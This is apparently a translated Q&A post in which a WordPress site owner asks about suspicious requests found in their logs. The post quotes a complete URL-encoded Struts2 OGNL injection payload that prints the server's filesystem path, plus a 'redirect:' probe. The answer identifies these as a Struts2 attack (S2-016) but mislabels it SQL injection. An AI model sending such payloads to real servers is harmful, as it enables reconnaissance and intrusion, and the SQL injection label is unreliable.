攻击网站WordPress

时间:2015-10-17 09:18:26

标签: java wordpress

今天我已经登录并第一次看到它了:

mysite.com/?debug=command&expression=%23res%3d%23context.get(\'com.opensymphony.xwork2.dispatcher.HttpServletResponse\'),%23res.setCharacterEncoding(%22UTF-8%22),%23req%3d%23context.get(\'com.opensymphony.xwork2.dispatcher.HttpServletRequest\'),%23res.getWriter().print(%22dir:%22),%23res.getWriter().println(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23res.getWriter().flush(),%23res.getWriter().close()

之后的另一个:

mysite.com/?redirect:

它能导致什么?注射数据库?病毒

1 个答案:

答案 0 :(得分:1)

看起来有人正在尝试利用struts2中的SQL注入漏洞来执行远程代码执行。

请参阅http://struts.apache.org/docs/s2-016.html